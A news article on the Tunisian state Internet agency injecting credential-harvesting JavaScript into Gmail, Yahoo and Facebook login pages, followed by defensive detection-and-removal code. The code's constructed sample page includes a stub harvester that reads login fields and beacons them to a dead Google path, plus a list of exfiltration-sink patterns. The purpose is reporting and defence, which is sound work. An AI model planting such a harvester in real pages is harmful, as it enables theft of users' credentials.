Tunisian government harvesting usernames and passwords

The Tunisian Internet Agency (Agence tunisienne d'Internet, or ATI) is being blamed for injected JavaScript that captures usernames and passwords. The code has been discovered on the login pages of Gmail, Yahoo, and Facebook, and is said to be the reason for the recent rash of account hijackings reported by Tunisian protesters.

ATI is run by the Tunisian Ministry of Communications. It supplies all of the privately held Tunisian ISPs, making it the main source of Internet access in the country, and it has been under scrutiny for years for using that position to regulate the entire national network. Last April, ATI earned international attention by blocking access to sites such as Flickr, YouTube, and Vimeo.

According to Reporters Without Borders, the authorities claim to target only pornographic or terrorist websites. “However, censorship applies above all to political opposition, independent news, and human rights websites.”

“When an Internet user attempts to access a prohibited website, the following automatic error message appears: ‘Error 404: page not found,’ without displaying the familiar ‘Error 403’ more typical of a blocked site... This strategy equates to a disguised form of censorship.”

As for the JavaScript itself, The Tech Herald has seen examples of the embedded script during live surfing sessions with sources in Tunisia, and in source code posted to the Web. The source for the Gmail injection is here, the Yahoo injection is here, and the Facebook injection is here.

Four different experts consulted by The Tech Herald independently confirmed our assessment: the embedded code is siphoning off login credentials.

On Twitter, security researcher Gerry Kavanagh and Errata Security CTO David Maynor told us that you can tell the code is capturing login information by the way it references the login form's elements.

“Suffice to say, the code is definitely doing something surreptitious,” Kavanagh noted.

Daniel Crowley, Technical Specialist at Core Security, and Rapid7's Josh Abraham broke the code down further. Crowley explained that the JavaScript is customized for each site's login form: it pulls the username and password and encodes them with a weak crypto algorithm.

The encoded data is placed into the URL, along with a randomly generated five-character key. The key itself is meaningless; it is assumed to be there to give the URL a false sense of legitimacy.

The random characters and the encoded credentials are delivered as a GET request to a non-working URL. In the Gmail example, that URL is http://www.google.com/wo0dh3ad. Abraham noted that the encoding makes it easy to capture usernames and passwords that include special characters such as ‘%’ or ‘/’. Those characters have special meaning in a URL, so encoding them first keeps the request intact.

Considering that the backbone of the Tunisian Internet is full of state-run filters and firewalls designed to block access, configuring one to log the GET requests carrying the harvested data would be trivial. The request does not even need to succeed: the credentials are read off the wire as the plaintext request passes the filter, so the 404 that Google eventually returns is irrelevant. But is this a government-sponsored action?

The likelihood that a group of criminals compromised the entire Tunisian infrastructure is virtually nonexistent. Code planting on this scale could only originate from an ISP. Given its history of holding an iron grip on the Internet, ATI is the logical source of the information harvesting.

There is an upside, however: the embedded JavaScript appears only when one of the sites is accessed over HTTP instead of HTTPS, since an on-path device can rewrite a plaintext page but cannot alter one inside an HTTPS session without breaking the site's certificate. In each test case, we were able to confirm that Gmail and Yahoo were only compromised when HTTP was used. Facebook, on the other hand, defaults to HTTP, so users in Tunisia will need to visit the HTTPS address manually.

Another interesting note is that the embedded code appears to have targeted Tunisian users for several months. Slim Amamou, of the Global Voices Advocacy blog, reported his findings on the code last July, and at the time ATI was blocking Google's HTTPS port, forcing users back to HTTP and thereby defeating the protection HTTPS would otherwise give.

The information surrounding the embedded JavaScript came to our attention thanks to a user on the IRC server where supporters of Anonymous' Operation: Tunisia gathered to show support for Tunisian protesters. When word spread of the embedded code and the account hijackings, Anonymous offered Tunisian users help via Userscripts.org, in the form of a browser user script that strips the added JavaScript.
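To make the two technical points above concrete, the harvesting mechanism (a script that reads the login fields, tags the data with a random key, and fires a GET to a dead path on the real site) and the counter-measure (stripping the injected script), here is an added example. It is not code from The Tech Herald, from ATI, or from the Anonymous user script. It models the stripping step as a static check over a page's HTML so that it runs in Node without a browser. The sample sign-in page, the field names Email and Passwd, the harvester stub inside the page, and the detection heuristics are all constructed or assumed for this example; only the path /wo0dh3ad comes from the article, and enc() stands in for the weak encoding, which is not reproduced.

```javascript
// Added example: static detection and removal of an injected credential
// harvester from a login page's HTML. Not the article's, ATI's, or the
// Anonymous user script's code; sample page and heuristics are constructed.

// Constructed sample: a cut-down sign-in page as served over plain HTTP.
// The first <script> is legitimate page code. The second is a stand-in for
// the injected harvester described in the article: it reads the form fields,
// adds a random five-character key, and fires a GET to a dead path on the
// real site. enc() is a placeholder for the weak encoding (not reproduced).
const SAMPLE_HTML = `<html><head><title>Sign in</title>
<script>function focusFirst(){document.forms[0].Email.focus();}</script>
</head><body onload="focusFirst()">
<form action="https://www.google.com/accounts/ServiceLoginAuth" method="post">
<input type="text" name="Email" id="Email">
<input type="password" name="Passwd" id="Passwd">
<input type="submit" value="Sign in">
</form>
<script>
function h(){var u=document.getElementById("Email").value,p=document.getElementById("Passwd").value;
var k=Math.random().toString(36).substr(2,5);
new Image().src="http://www.google.com/wo0dh3ad?"+k+enc(u+":"+p);}
document.forms[0].onsubmit=h;
</script>
</body></html>`;

// Pull every inline <script> block out of the HTML, recording its exact span
// so it can be cut out again later.
function extractScripts(html) {
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    out.push({ start: m.index, end: m.index + m[0].length, text: m[1] });
  }
  return out;
}

// Names and ids of every password input on the page: the fields a harvester
// has to touch to get at the password.
function passwordFieldNames(html) {
  const names = new Set();
  const inputRe = /<input\b[^>]*>/gi;
  let m;
  while ((m = inputRe.exec(html)) !== null) {
    const tag = m[0];
    if (!/type\s*=\s*["']?password["']?/i.test(tag)) continue;
    for (const attr of ['name', 'id']) {
      const a = new RegExp(attr + '\\s*=\\s*["\']?([^"\'\\s>]+)', 'i').exec(tag);
      if (a) names.add(a[1]);
    }
  }
  return [...names];
}

// Assumed heuristic: a script is suspicious only if it both references a
// password field AND contains a way to send data off the page (image beacon,
// XHR, fetch, navigation, or creation of an img/iframe/script element).
// Either trait alone is common in benign page code.
const EXFIL_SINKS = [
  /new\s+Image\s*\(/, /\.src\s*=/, /XMLHttpRequest/, /\bfetch\s*\(/,
  /location\s*(\.href)?\s*=/, /createElement\s*\(\s*["'](img|iframe|script)["']/i,
];

function findCredentialExfil(html) {
  const fields = passwordFieldNames(html);
  return extractScripts(html).filter(s => {
    const touchesPassword =
      fields.some(f => s.text.includes(f)) || /password/i.test(s.text);
    const hasSink = EXFIL_SINKS.some(re => re.test(s.text));
    return touchesPassword && hasSink;
  });
}

// Remove the flagged <script> elements, cutting from the end of the document
// backwards so earlier offsets stay valid.
function stripFlaggedScripts(html) {
  const flagged = findCredentialExfil(html).sort((a, b) => b.start - a.start);
  let out = html;
  for (const s of flagged) out = out.slice(0, s.start) + out.slice(s.end);
  return out;
}
```

Running findCredentialExfil(SAMPLE_HTML) flags only the second script, and stripFlaggedScripts(SAMPLE_HTML) returns the page with that script gone and the legitimate one intact. A real user script would apply the same test to document.scripts in the live DOM rather than to an HTML string, and the heuristics will miss a harvester that obfuscates the field names or the sink; the reliable fix remains loading the login page over HTTPS, which leaves an on-path injector nothing to rewrite.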

The ATI website has been offline for more than a day; the outage started after Anonymous launched Operation: Tunisia. Our coverage of their actions and of the problems in Tunisia is here.
